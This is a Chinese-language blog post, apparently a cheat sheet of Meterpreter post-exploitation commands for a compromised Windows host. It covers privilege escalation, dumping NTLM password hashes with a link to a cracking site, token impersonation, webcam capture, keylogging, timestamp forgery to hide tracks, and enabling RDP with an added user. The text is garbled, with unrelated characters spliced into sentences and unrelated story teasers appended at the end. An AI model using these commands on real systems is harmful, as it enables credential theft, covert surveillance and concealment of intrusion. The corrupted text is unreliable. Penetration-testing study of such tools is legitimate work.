meterpreter后期攻擊使用方法

?meterpreter后期攻擊使用方法

1厉熟、上傳文件到Windows主機(jī)

upload?<file>?<destination>?

命令2:從windows主機(jī)下載文件

download?<file>?<path?to?save>?

注意:Windows路徑要使用雙斜線

命令3:在目標(biāo)主機(jī)上執(zhí)行exe文件

execute?-f?<path>?[options]?

?例:execute -f c://1.exe?

命令4:創(chuàng)建CMD新通道

execute?-f?cmd?-c?

命令5:顯示進(jìn)程(相當(dāng)于打開任務(wù)管理器)

ps命令會(huì)顯示目標(biāo)主機(jī)上所有正在運(yùn)行的進(jìn)程

命令:

ps?

命令6:獲取目標(biāo)主機(jī)的cmd shell

shell命令可以進(jìn)入目標(biāo)主機(jī)的cmd

命令:shell?

命令7:獲取admin權(quán)限

getsystem命令可以提權(quán)到本地系統(tǒng)權(quán)限

命令:getsystem?

命令8:使用Hashdump轉(zhuǎn)儲(chǔ)所有hash值

我們可以使用meterpreter shell來dump目標(biāo)主機(jī)的當(dāng)前系統(tǒng)賬戶和密碼邦危。轉(zhuǎn)儲(chǔ)的內(nèi)容是NTML哈希格式誉券,網(wǎng)上有很多工具和技巧來破解它們退子。

NTLM在線破解:https://hashkiller.co.uk/ntlm-decrypter.aspx

命令:hashdump?

輸出的每一行內(nèi)容格式如下

Username:SID:LM?hash:NTLM?hash::: (重點(diǎn):每個(gè)Windows用戶都有自己唯一的SID窒所。

Windows系統(tǒng)管理員administrator的UID是500眉菱,普通用戶UID從1000開始。

)(SID也就是安全標(biāo)識(shí)符(Security Identifiers)拐格,是標(biāo)識(shí)用戶僧免、組和計(jì)算機(jī)帳戶的唯一的號(hào)碼。)

命令10:創(chuàng)建端口轉(zhuǎn)發(fā)(了解)

meterpreter shell中的portfwd命令是轉(zhuǎn)發(fā)技術(shù)中最常用的一個(gè)命令捏浊,可以讓攻擊系統(tǒng)訪問本來無法直接訪問的目標(biāo)主機(jī)懂衩。

add選項(xiàng)會(huì)將端口轉(zhuǎn)發(fā)添加到列表中,而且本質(zhì)上會(huì)創(chuàng)建一個(gè)隧道金踪。

請(qǐng)注意:這個(gè)隧道存在于meterpreter控制臺(tái)之外浊洞,任何終端會(huì)話都可以使用。

命令:portfwd add -l 6666 -p 3389 -r 127.0.0.1 #將目標(biāo)機(jī)的3389端口轉(zhuǎn)發(fā)到本地6666端口

命令11:刪除端口轉(zhuǎn)發(fā)

跟創(chuàng)建端口轉(zhuǎn)發(fā)命令類似胡岔,這條命令是刪除一條端口轉(zhuǎn)發(fā)記錄

命令:

portfwd?delete?-l?<portnumber>?-p?<portnumber>?-r?<Target?IP>?

如果你想顯示所有端口轉(zhuǎn)發(fā)記錄法希,你可以使用portfwd list命令,如果你想刪除所有的記錄靶瘸,可以使用portfwd flush命令

命令12:在目標(biāo)主機(jī)上搜索文件

搜索命令可以來定位查找目標(biāo)主機(jī)上的特定文件苫亦。這個(gè)命令可以搜索整個(gè)文件系統(tǒng),也可以搜索特定的文件夾怨咪。

例如屋剑,如果你想搜索目標(biāo)主機(jī)上的所有txt文件,可以使用下列命令:

命令:search?-f??*.txt?

命令13:獲取用戶ID

getuid命令會(huì)顯示主機(jī)上運(yùn)行meterpreter 服務(wù)的用戶

命令:getuid?

命令14:獲取系統(tǒng)信息

sysinfo命令會(huì)顯示系統(tǒng)名诗眨,操作系統(tǒng)唉匾,架構(gòu)和語言等。

命令:sysinfo?

命令15:模擬任意用戶(token操作)

不一定百分百成功匠楚,但是有幾率巍膘。用戶之間不需要密碼,用token值來切換芋簿。

這個(gè)進(jìn)程對(duì)于攻擊像微軟活動(dòng)目錄這樣的分布式系統(tǒng)非常有幫助峡懈,因?yàn)樵谖④浕顒?dòng)目錄中,本地訪問權(quán)限并沒多大用益咬,但是如果能搞到憑證尤其是管理員憑證,那就非常有用了。

incognito最開始是一個(gè)獨(dú)立的應(yīng)用幽告,當(dāng)你成功入侵系統(tǒng)后可以用它來模擬用戶tokens梅鹦。這個(gè)應(yīng)用后來集成到了metasploit,并且最終集成到了meterpreter中冗锁,使用如下:

在meterpreter會(huì)話中加載這個(gè)模塊非常簡單齐唆,只要輸入 use incognito命令即可

輸入list_tokens -u來顯示所有有效的tokens

然后我們需要模擬某個(gè)token來獲取其權(quán)限。還有注意冻河,如果成功模擬了一個(gè)token箍邮,我們可以使用getuid命令來檢查當(dāng)前用戶ID

1.use?incognito?

2.list_tokens?-u?

3.impersonate_token?“Machine\\user”?

命令16:webcam攝像頭命令

webcam_list ?#查看攝像頭

webcam_snap ??#通過攝像頭拍照

webcam_stream ??#通過攝像頭開啟視頻

命令17:execute執(zhí)行文件(這條不用記,看前面的就行)

execute #在目標(biāo)機(jī)中執(zhí)行文件

execute -H -i -f cmd.exe #創(chuàng)建新進(jìn)程cmd.exe叨叙,-H不可見锭弊,-i交互

命令18:timestomp偽造時(shí)間戳

timestomp C:// -h ??#查看幫助

timestomp -v C://2.txt ??#查看時(shí)間戳

timestomp C://2.txt -f C://1.txt #將1.txt的時(shí)間戳復(fù)制給2.txt

命令19:enable_rdp腳本開啟3389

run post/windows/manage/enable_rdp ?#開啟遠(yuǎn)程桌面

run post/windows/manage/enable_rdp USERNAME=www2 PASSWORD=123456 #添加用戶

run post/windows/manage/enable_rdp FORWARD=true LPORT=6662 ?#將3389端口轉(zhuǎn)發(fā)到6662

腳本位于/usr/share/metasploit-framework/modules/post/windows/manage/enable_rdp.rb通過enable_rdp.rb腳本可知:開啟rdp是通過reg修改注冊(cè)表;添加用戶是調(diào)用cmd.exe 通過net user添加擂错;端口轉(zhuǎn)發(fā)是利用的portfwd命令

命令20:鍵盤記錄

keyscan_start ?#開始鍵盤記錄

keyscan_dump ??#導(dǎo)出記錄數(shù)據(jù)

keyscan_stop #結(jié)束鍵盤記錄

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末味滞,一起剝皮案震驚了整個(gè)濱河市,隨后出現(xiàn)的幾起案子钮呀,更是在濱河造成了極大的恐慌剑鞍,老刑警劉巖,帶你破解...
    沈念sama閱讀 222,464評(píng)論 6 517
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件爽醋,死亡現(xiàn)場(chǎng)離奇詭異蚁署,居然都是意外死亡,警方通過查閱死者的電腦和手機(jī)蚂四,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 95,033評(píng)論 3 399
  • 文/潘曉璐 我一進(jìn)店門光戈,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人证杭,你說我怎么就攤上這事田度。” “怎么了解愤?”我有些...
    開封第一講書人閱讀 169,078評(píng)論 0 362
  • 文/不壞的土叔 我叫張陵镇饺,是天一觀的道長。 經(jīng)常有香客問我送讲,道長奸笤,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 59,979評(píng)論 1 299
  • 正文 為了忘掉前任哼鬓,我火速辦了婚禮监右,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘异希。我一直安慰自己健盒,他們只是感情好,可當(dāng)我...
    茶點(diǎn)故事閱讀 69,001評(píng)論 6 398
  • 文/花漫 我一把揭開白布。 她就那樣靜靜地躺著扣癣,像睡著了一般惰帽。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上父虑,一...
    開封第一講書人閱讀 52,584評(píng)論 1 312
  • 那天该酗,我揣著相機(jī)與錄音,去河邊找鬼士嚎。 笑死呜魄,一個(gè)胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的莱衩。 我是一名探鬼主播爵嗅,決...
    沈念sama閱讀 41,085評(píng)論 3 422
  • 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場(chǎng)噩夢(mèng)啊……” “哼膳殷!你這毒婦竟也來了操骡?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 40,023評(píng)論 0 277
  • 序言:老撾萬榮一對(duì)情侶失蹤赚窃,失蹤者是張志新(化名)和其女友劉穎册招,沒想到半個(gè)月后,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體勒极,經(jīng)...
    沈念sama閱讀 46,555評(píng)論 1 319
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡是掰,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 38,626評(píng)論 3 342
  • 正文 我和宋清朗相戀三年,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了辱匿。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片键痛。...
    茶點(diǎn)故事閱讀 40,769評(píng)論 1 353
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡,死狀恐怖匾七,靈堂內(nèi)的尸體忽然破棺而出絮短,到底是詐尸還是另有隱情,我是刑警寧澤昨忆,帶...
    沈念sama閱讀 36,439評(píng)論 5 351
  • 正文 年R本政府宣布丁频,位于F島的核電站,受9級(jí)特大地震影響邑贴,放射性物質(zhì)發(fā)生泄漏席里。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 42,115評(píng)論 3 335
  • 文/蒙蒙 一拢驾、第九天 我趴在偏房一處隱蔽的房頂上張望奖磁。 院中可真熱鬧,春花似錦繁疤、人聲如沸咖为。這莊子的主人今日做“春日...
    開封第一講書人閱讀 32,601評(píng)論 0 25
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽躁染。三九已至封恰,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間褐啡,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 33,702評(píng)論 1 274
  • 我被黑心中介騙來泰國打工鳖昌, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留备畦,地道東北人。 一個(gè)月前我還...
    沈念sama閱讀 49,191評(píng)論 3 378
  • 正文 我出身青樓许昨,卻偏偏與公主長得像懂盐,于是被迫代替她去往敵國和親。 傳聞我的和親對(duì)象是個(gè)殘疾皇子糕档,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 45,781評(píng)論 2 361